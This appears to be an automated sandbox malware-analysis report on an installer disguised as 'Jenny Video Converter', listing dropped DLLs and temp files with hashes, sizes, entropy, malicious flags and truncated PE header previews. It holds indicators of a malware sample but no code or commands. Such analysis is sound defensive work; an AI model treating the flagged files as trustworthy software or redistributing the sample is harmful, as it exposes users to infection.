                                                                              Size (bytes):92019
                                                                              Entropy (8bit):5.974787373427489
                                                                              Encrypted:false
                                                                              SSDEEP:1536:+j80nVGEhJyBnvQXUDkUPoWCSgZosDGMsZLXWU9+HN4yoRtJJ:C8IgtyUDkBWIZosDGDBXWPHN4yoRtJJ
                                                                              MD5:CC7DAD980DD04E0387795741D809CBF7
                                                                              SHA1:A49178A17B1C72AD71558606647F5011E0AA444B
                                                                              SHA-256:0BAE9700E29E4E7C532996ADF6CD9ADE818F8287C455E16CF2998BB0D02C054B
                                                                              SHA-512:E4441D222D7859169269CA37E491C37DAA6B3CDD5F4A05A0A246F21FA886F5476092E64DFF88890396EF846B9E8D2880E33F1F594CD61F09023B3EF4CD573EA3
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...(....0..7......#.........,.....................m................................B......... ...................... .......0...*...........................................................p......................t5...............................text..............................`.P`.data... ...........................@.0..rdata..............................@.`@/4.......(.......*..................@.0@.bss..................................`..edata....... ......................@.0@.idata...*...0...,..................@.0..CRT....,....`....... ..............@.0..tls.... ....p......."..............@.0..rsrc................$..............@.0..reloc...............(..............@.0B........................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Jenny Video Converter\libpangomm-1.4-1.dll (copy)

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):165739
                                                                              Entropy (8bit):6.062324507479428
                                                                              Encrypted:false
                                                                              SSDEEP:3072:wqozCom32MhGf+cPlDQ6jGQGExqLsGXnru+5FMCp:wqxo4LGlDQ6yQGsqLsGXruSFMCp
                                                                              MD5:E2F18B37BC3D02CDE2E5C15D93E38418
                                                                              SHA1:1A6C58F4A50269D3DB8C86D94B508A1919841279
                                                                              SHA-256:7E555192331655B04D18F40E8F19805670D56FC645B9C269B9F10BF45A320C97
                                                                              SHA-512:61AB4F3475B66B04399111B106C3F0A744DC226A59EB03C134AE9216A9EA0C7F9B3B211148B669C32BAFB05851CC6C18BD69EA431DBC2FE25FE470CB4786FD17
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........0.........#.........,.....................n................................&......... .........................y....0...D..................................................................................x7...............................text...............................`.P`.data... ...........................@.0..rdata..............................@.`@/4......Dg.......h..................@.0@.bss....(....p........................`..edata..y............8..............@.0@.idata...D...0...F..................@.0..CRT....,............ ..............@.0..tls.... ............"..............@.0..reloc...............$..............@.0B................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Jenny Video Converter\libpangowin32-1.0-0.dll (copy)

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):101544
                                                                              Entropy (8bit):6.237382830377451
                                                                              Encrypted:false
                                                                              SSDEEP:1536:nrYjG+7rjCKdiZ4axdj+nrlv3ecaQZ93yQNMRP2Ea5JPTxi0C9A046QET:M9eKdiBxUnfb3yZROEYJPTxib9A5ET
                                                                              MD5:E13FCD8FB16E483E4DE47A036687D904
                                                                              SHA1:A54F56BA6253D4DECAAE3DE8E8AC7607FD5F0AF4
                                                                              SHA-256:0AC1C17271D862899B89B52FAA13FC4848DB88864CAE2BF4DC7FB81C5A9A49BF
                                                                              SHA-512:38596C730B090B19E34183182273146C3F164211644EBC0A698A83651B2753F7D9B1D6EE477D1798BD7219B5977804355E2F57B1C3013BF3D498BF96DEC9D02E
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........d.........#.........`....................Hk.................................$........ ......................`..-....p......................................................................................Lt...............................text...............................`.P`.data...L...........................@.0..rdata..............................@.`@/4.......*... ...,..................@.0@.bss.........P........................`..edata..-....`.......*..............@.0@.idata.......p... ...0..............@.0..CRT....,............P..............@.0..tls.... ............R..............@.0..rsrc................T..............@.0..reloc...............X..............@.0B........................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Jenny Video Converter\libpcre-1.dll (copy)

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):291245
                                                                              Entropy (8bit):6.234245376773595
                                                                              Encrypted:false
                                                                              SSDEEP:6144:dg6RpdbWJbnZ9zwvNOmdcm0sn+g2eqZq6eadTD8:UJ99zwvNOmdcm0s+g1qZQadTD8
                                                                              MD5:2D8A0BC588118AA2A63EED7BF6DFC8C5
                                                                              SHA1:7FB318DC21768CD62C0614D7AD773CCFB7D6C893
                                                                              SHA-256:707DEE17E943D474FBE24EF5843A9A37E923E149716CAD0E2693A0CC8466F76E
                                                                              SHA-512:A296A8629B1755D349C05687E1B9FAE7ED5DE14F2B05733A7179307706EA6E83F9F9A8729D2B028EDDC7CAF8C8C30D69AD4FEA6EC19C66C945772E7A34F100DE
                                                                              Malicious:false
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........h..@......#.........d....................4i................................<......... ......................p..5.......t...................................................................................<................................text...T...........................`.P`.data...0...........................@.0..rdata...v.......x..................@.`@/4...........@......................@.0@.bss.........`........................`..edata..5....p.......6..............@.0@.idata..t............>..............@.0..CRT....,............F..............@.0..tls.... ............H..............@.0..reloc...............J..............@.0B................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Jenny Video Converter\libpixman-1-0.dll (copy)

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):706136
                                                                              Entropy (8bit):6.517672165992715
                                                                              Encrypted:false
                                                                              SSDEEP:12288:8TCY9iAO+e+693qCfG0l2KDIq4N1i9aqi+:8piAO+e+69ne02KDINN1MaZ+
                                                                              MD5:3A8A13F0215CDA541EC58F7C80ED4782
                                                                              SHA1:085C3D5F62227319446DD61082919F6BE1EFD162
                                                                              SHA-256:A397C9C2B5CAC7D08A2CA720FED9F99ECE72078114FFC86DF5DBC2B53D5FA1AD
                                                                              SHA-512:4731D7ABB8DE1B77CB8D3F63E95067CCD7FAFED1FEB508032CB41EE9DB3175C69E5D244EEE8370DE018140D7B1C863A4E7AFBBE58183294A0E7CD98F2A8A0EAD
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...t.......Q......#..............................Pe......................... ................ .........................A.......L............................... ,......................................................,............................text...8...........................`.P`.data...............................@.P..rdata..............................@.`@/4......\............x..............@.0@.bss..................................`..edata..A........ ...^..............@.0@.idata..L............~..............@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc.. ,..........................@.0B................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Jenny Video Converter\libpng16-16.dll (copy)

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):248781
                                                                              Entropy (8bit):6.474165596279956
                                                                              Encrypted:false
                                                                              SSDEEP:3072:oW4uzRci3pB4FvOhUHN1Dmfk46sR6/9+B7Bt9Z42fTSCi3QUqbQrPeL8rFErGfju:n4uB4FvHNElE9+B7Bj6GTSCiZPNVS
                                                                              MD5:C4002F9E4234DFB5DBE64C8D2C9C2F09
                                                                              SHA1:5C1DCCE276FDF06E6AA1F6AD4D4B49743961D62D
                                                                              SHA-256:F5BC251E51206592B56C3BD1BC4C030E2A98240684263FA766403EA687B1F664
                                                                              SHA-512:4F7BC8A431C07181A3D779F229E721958043129BBAEC65A538F2DD6A2CAB8B4D6165B4149B1DF56B31EB062614363A377E1982FD2F142E49DA524C1C96FC862E
                                                                              Malicious:false
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........]......#...............................h......................... .......!........ .........................A.......\.......................................................................................\............................text..............................`.P`.data...T...........................@.0..rdata..P[.......\..................@.`@/4.......v...0...v..................@.0@.bss..................................`..edata..A........ ..................@.0@.idata..\...........................@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc..............................@.0B................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Jenny Video Converter\librsvg-2-2.dll (copy)

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):248694
                                                                              Entropy (8bit):6.346971642353424
                                                                              Encrypted:false
                                                                              SSDEEP:6144:MUijoruDtud8kVtHvBcEcEJAbNkhJIXM3rhv:Cy8kTHvBcE1kI3rhv
                                                                              MD5:39A15291B9A87AEE42FBC46EC1FE35D6
                                                                              SHA1:AADF88BBB156AD3CB1A2122A3D6DC017A7D577C1
                                                                              SHA-256:7D4546773CFCC26FEC8149F6A6603976834DC06024EEAC749E46B1A08C1D2CF4
                                                                              SHA-512:FF468FD93EFDB22A20590999BC9DD68B7307BD406EB3746C74A3A472033EA665E6E3F778325849DF9B0913FFC7E4700E2BEED4666DA6E713D984E92F9DB5F679
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........w......#.....x.........................i.......................................... ......................`..u........1...................................................................................................................text...Tw.......x..................`.P`.data................|..............@.`..rdata..t;.......<...~..............@.`@/4.......f.......h..................@.0@.bss.........P........................`..edata..u....`......."..............@.0@.idata...1.......2...>..............@.0..CRT....,............p..............@.0..tls.... ............r..............@.0..reloc...............t..............@.0B................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Jenny Video Converter\libsigc-2.0-0.dll (copy)

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):30994
                                                                              Entropy (8bit):5.666281517516177
                                                                              Encrypted:false
                                                                              SSDEEP:768:SrCNSOFBZVDIxxDsIpx0uZjaYNdJSH6J6:SrCyx0maYNdh6
                                                                              MD5:3C033F35FE26BC711C4D68EB7CF0066D
                                                                              SHA1:83F1AED76E6F847F6831A1A1C00FEDC50F909B81
                                                                              SHA-256:9BA147D15C8D72A99BC639AE173CFF2D22574177242A7E6FE2E9BB09CC3D5982
                                                                              SHA-512:7811BE5CCBC27234CE70AB4D6541556612C45FE81D5069BA64448E78953387B1C023AA2A04E5DBF8CAACE7291B8B020BEE2F794FBC190837F213B8D6CB698860
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........p..8......#.....*...l...............@.....j.......................................... .........................a.......(...............................x...................................................,................................text...8(.......*..................`.P`.data... ....@......................@.0..rdata.......P.......0..............@.0@/4...........`.......6..............@.0@.bss..................................`..edata..a............L..............@.0@.idata..(............`..............@.0..CRT....,............h..............@.0..tls.... ............j..............@.0..reloc..x............l..............@.0B................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Jenny Video Converter\libtiff-5.dll (copy)

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):448557
                                                                              Entropy (8bit):6.353356595345232
                                                                              Encrypted:false
                                                                              SSDEEP:12288:TC5WwqtP7JRSIOKxQg2FgggggggTggZgoggggggggggggggggggnggDggD7d:TC5WltP7JRSIOKxmeR
                                                                              MD5:908111F583B7019D2ED3492435E5092D
                                                                              SHA1:8177C5E3B4D5CC1C65108E095D07E0389164DA76
                                                                              SHA-256:E8E2467121978653F9B6C69D7637D8BE1D0AC6A4028B672A9B937021AD47603C
                                                                              SHA-512:FD35BACAD03CFA8CD1C0FFF2DAC117B07F516E1E37C10352ED67E645F96E31AC499350A2F21702EB51BE83C05CF147D0876DAC34376EEDE676F3C7D4E4A329CB
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....,...................@.....i......................... ......._........ .........................[.......X...............................(&...................................................... ............................text...d*.......,..................`.P`.data........@.......0..............@.`..rdata......P.......2..............@.`@/4..................................@.0@.bss....|.............................`..edata..[............j..............@.0@.idata..X...........................@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc..(&.......(..................@.0B................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Jenny Video Converter\libwinpthread-1.dll (copy)

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):65181
                                                                              Entropy (8bit):6.085572761520829
                                                                              Encrypted:false
                                                                              SSDEEP:768:1JrcDWlFkbBRAFqDnlLKgprfElH0hiGoeLXRcW/VB6dkhxLemE5ZHvIim3YWATMk:XrTk3iqzlLKgp6H38B6u0Uim3Y15P
                                                                              MD5:98A49CC8AE2D608C6E377E95833C569B
                                                                              SHA1:BA001D8595AC846D9736A8A7D9161828615C135A
                                                                              SHA-256:213B6ADDAB856FEB85DF1A22A75CDB9C010B2E3656322E1319D0DEF3E406531C
                                                                              SHA-512:C9D756BB127CAC0A43D58F83D01BFE1AF415864F70C373A933110028E8AB0E83612739F2336B28DC44FAABA6371621770B5BCC108DE7424E31378E2543C40EFC
                                                                              Malicious:false
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........[......#...............................d.........................p................ .............................. .......P..P....................`..x............................@.......................!..\............................text...D...........................`.P`.data...D...........................@.0..rdata..l...........................@.0@/4......p/.......0..................@.0@.bss..................................`..edata..............................@.0@.idata....... ......................@.0..CRT....0....0......................@.0..tls.... ....@......................@.0..rsrc...P....P......................@.0..reloc..x....`......................@.0B........................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Jenny Video Converter\uninstall\is-SAKD7.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):720373
                                                                              Entropy (8bit):6.507181979060254
                                                                              Encrypted:false
                                                                              SSDEEP:12288:Vhu7eEcdCP8trP837szHUA6JCzS9Ntc3l3ER6orNjURFFDExyFn:nu7eEYCP8trP837szHUA60SLtcV3E9kT
                                                                              MD5:B28794FF6BAE48ED147062F1FB186735
                                                                              SHA1:C1FA95D7481FE984FAA742A7270C79C2A6057127
                                                                              SHA-256:78896DDB8AEB779ABF3E39A71655BBD83D82AE633462C42BCAB371F873E987DF
                                                                              SHA-512:9A3D2356079E8D66DFCE93672F75960981778CDCA06FFF65D4AFFAEB3FCE26FA66F6CA34685ADE67371D7F3A0F88D3378CF85E95C2EC325EDC288CD2FBE3E316
                                                                              Malicious:true
                                                                              Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................x..........x.............@..............................................@...............................%..................................................................................................................CODE.....w.......x.................. ..`DATA.................|..............@...BSS.....l................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................^..............@..P........................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Jenny Video Converter\uninstall\unins000.dat

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp
                                                                              File Type:InnoSetup Log Jenny Video Converter, version 0x30, 6034 bytes, 760639\user, "C:\Users\user\AppData\Local\Jenny Video Converter"
                                                                              Category:dropped
                                                                              Size (bytes):6034
                                                                              Entropy (8bit):4.825421864850969
                                                                              Encrypted:false
                                                                              SSDEEP:96:tfdWk488Vp+a0239a+eOIhoNQ2dUrBXdNN6xsi6kG6k56ad2BMgnBc6weKul69WZ:FdWk48ip+a0+HIhTg6BJpAYy
                                                                              MD5:E2A9ABB784768C7D03A9136311476D66
                                                                              SHA1:D8F1EC7B0F1F8867AB1720A09B631548EA42C8EF
                                                                              SHA-256:D8E8AA06E13ECE618240AD2D2605B32C87B8ABA12A8FBBF9DDD4D05C0367BEF5
                                                                              SHA-512:C608670BB20A71BD0F1D5A1FEA3896A8C42BB3C50B1E531B619CD232D2F6648C32D5FFB10D858740DCE03581061E934EDE7E3325D41A645DBA3D30C6C3C58AEE
                                                                              Malicious:false
                                                                              Preview:Inno Setup Uninstall Log (b)....................................Jenny Video Converter...........................................................................................................Jenny Video Converter...........................................................................................................0...".......%............................................................................................................................kj.......X....760639.user5C:\Users\user\AppData\Local\Jenny Video Converter.............7.s.. ............IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...........................................!MAIN....-1..(...dll:kernel32.dll.CreateFileA..............$...dll:kernel32.dll.WriteFile............"...dll:kernel32.dll.CloseHandle........"...dll:kernel32.dll.ExitProcess........%...dl

                                                                              C:\Users\user\AppData\Local\Jenny Video Converter\uninstall\unins000.exe (copy)

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):720373
                                                                              Entropy (8bit):6.507181979060254
                                                                              Encrypted:false
                                                                              SSDEEP:12288:Vhu7eEcdCP8trP837szHUA6JCzS9Ntc3l3ER6orNjURFFDExyFn:nu7eEYCP8trP837szHUA60SLtcV3E9kT
                                                                              MD5:B28794FF6BAE48ED147062F1FB186735
                                                                              SHA1:C1FA95D7481FE984FAA742A7270C79C2A6057127
                                                                              SHA-256:78896DDB8AEB779ABF3E39A71655BBD83D82AE633462C42BCAB371F873E987DF
                                                                              SHA-512:9A3D2356079E8D66DFCE93672F75960981778CDCA06FFF65D4AFFAEB3FCE26FA66F6CA34685ADE67371D7F3A0F88D3378CF85E95C2EC325EDC288CD2FBE3E316
                                                                              Malicious:true
                                                                              Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................x..........x.............@..............................................@...............................%..................................................................................................................CODE.....w.......x.................. ..`DATA.................|..............@...BSS.....l................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................^..............@..P........................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Jenny Video Converter\zlib1.dll (copy)

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):98626
                                                                              Entropy (8bit):6.478068795827396
                                                                              Encrypted:false
                                                                              SSDEEP:1536:HDuZqv5WNPuWOD+QZ7OWN4oOlatKZ2XGnToIfQIOEIOGxpdo4VoWsj:r9P6WN4wyTBfGqGxpdo4VoB
                                                                              MD5:70CA53E8B46464CCF956D157501D367A
                                                                              SHA1:AE0356FAE59D9C2042270E157EA0D311A831C86A
                                                                              SHA-256:4A7AD2198BAACC14EA2FFD803F560F20AAD59C3688A1F8AF2C8375A0D6CC9CFE
                                                                              SHA-512:CB1D52778FE95D7593D1FDBE8A1125CD19134973B65E45F1E7D21A6149A058BA2236F4BA90C1CE01B1B0AFAD4084468D1F399E98C1F0D6F234CBA023FCC7B4AE
                                                                              Malicious:false
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....='=.x..=......#.........t.....................c.......................................... .................................8...............................0...................................................0................................text...t...........................`.P`.data... ...........................@.0..rdata...M.......N..................@.`@/4......t&...P...(...4..............@.0@.bss..................................`..edata...............\..............@.0@.idata..8............f..............@.0..CRT....,............n..............@.0..tls.... ............p..............@.0..reloc..0............r..............@.0B................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\N6jsQ3XNNX.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):709120
                                                                              Entropy (8bit):6.498750714093575
                                                                              Encrypted:false
                                                                              SSDEEP:12288:thu7eEcdCP8trP837szHUA6JCzS9Ntc3l3ER6orNjURFFDExyF:Pu7eEYCP8trP837szHUA60SLtcV3E9kT
                                                                              MD5:16C9D19AB32C18671706CEFEE19B6949
                                                                              SHA1:FCA23338CB77068E1937DF4E59D9C963C5548CF8
                                                                              SHA-256:C1769524411682D5A204C8A40F983123C67EFEADB721160E42D7BBFE4531EB70
                                                                              SHA-512:32B4B0B2FB56A299046EC26FB41569491E8B0CD2F8BEC9D57EC0D1AD1A7860EEC72044DAB2D5044CB452ED46E9F21513EAB2171BAFA9087AF6D2DE296455C64B
                                                                              Malicious:true
                                                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................x..........x.............@..............................................@...............................%..................................................................................................................CODE.....w.......x.................. ..`DATA.................|..............@...BSS.....l................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................^..............@..P........................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\is-SQ448.tmp\_isetup\_RegDLL.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):4096
                                                                              Entropy (8bit):4.026670007889822
                                                                              Encrypted:false
                                                                              SSDEEP:48:ivuz1hEU3FR/pmqBl8/QMCBaquEMx5BC+SS4k+bkguj0KHc:bz1eEFNcqBC/Qrex5iSKDkc
                                                                              MD5:0EE914C6F0BB93996C75941E1AD629C6
                                                                              SHA1:12E2CB05506EE3E82046C41510F39A258A5E5549
                                                                              SHA-256:4DC09BAC0613590F1FAC8771D18AF5BE25A1E1CB8FDBF4031AA364F3057E74A2
                                                                              SHA-512:A899519E78125C69DC40F7E371310516CF8FAA69E3B3FF747E0DDF461F34E50A9FF331AB53B4D07BB45465039E8EBA2EE4684B3EE56987977AE8C7721751F5F9
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................H................|.......|.......|......Rich............PE..L....M;J..................................... ....@..........................@..............................................l ..P....0..@............................................................................ ..D............................text............................... ..`.rdata....... ......................@..@.rsrc...@....0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\is-SQ448.tmp\_isetup\_iscrypt.dll

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):2560
                                                                              Entropy (8bit):2.8818118453929262
                                                                              Encrypted:false
                                                                              SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
                                                                              MD5:A69559718AB506675E907FE49DEB71E9
                                                                              SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                                                                              SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
                                                                              SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\is-SQ448.tmp\_isetup\_setup64.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp
                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):6144
                                                                              Entropy (8bit):4.215994423157539
                                                                              Encrypted:false
                                                                              SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12pS5SKvkc:sfJEVYlvxaX12EF
                                                                              MD5:4FF75F505FDDCC6A9AE62216446205D9
                                                                              SHA1:EFE32D504CE72F32E92DCF01AA2752B04D81A342
                                                                              SHA-256:A4C86FC4836AC728D7BD96E7915090FD59521A9E74F1D06EF8E5A47C8695FD81
                                                                              SHA-512:BA0469851438212D19906D6DA8C4AE95FF1C0711A095D9F21F13530A6B8B21C3ACBB0FF55EDB8A35B41C1A9A342F5D3421C00BA395BC13BB1EF5902B979CE824
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d...XW:J..........#............................@.............................`..............................................................<!.......P..@....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...@....P......................@..@................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\is-SQ448.tmp\_isetup\_shfoldr.dll

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):23312
                                                                              Entropy (8bit):4.596242908851566
                                                                              Encrypted:false
                                                                              SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                                                                              MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                                                                              SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                                                                              SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                                                                              SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                                                                              Malicious:false
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              Static File Info

                                                                              General

                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Entropy (8bit):7.998625965057227
                                                                              TrID:
                                                                              • Win32 Executable (generic) a (10002005/4) 98.86%
                                                                              • Inno Setup installer (109748/4) 1.08%
                                                                              • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                              File name:N6jsQ3XNNX.exe
                                                                              File size:4'512'180 bytes
                                                                              MD5:46d2e28be5ad34097672b73bfa78e805
                                                                              SHA1:46450994830546f63d2079fddb1cd79b71584a3b
                                                                              SHA256:433c601579555db1aa2f00a2188b73306c5b8907ea17ec3f901baf35796e7a31
                                                                              SHA512:f9f11bf4fa5744b60724f6a0f59632faf7765acea2cbace3a9abae17a138193fe8eab0879ed7c1d87cb5190f7d25f15b177d8652cb2502239d4941bfdb61388c
                                                                              SSDEEP:98304:NZdqAabCU31piiFenLDSjKgPQjK0psxkklrLgx7mdxd/:/dqAadpijnLDqeFs8ErR
                                                                              TLSH:2E26332AB45D9730C1B5E974FE38A44372EE3DD21B101B25B58EACEE566B0114EE8378
                                                                              File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                              File Icon

                                                                              Icon Hash:2d2e3797b32b2b99

                                                                              Static PE Info

                                                                              General

                                                                              Entrypoint:0x409c40
                                                                              Entrypoint Section:CODE
                                                                              Digitally signed:false
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
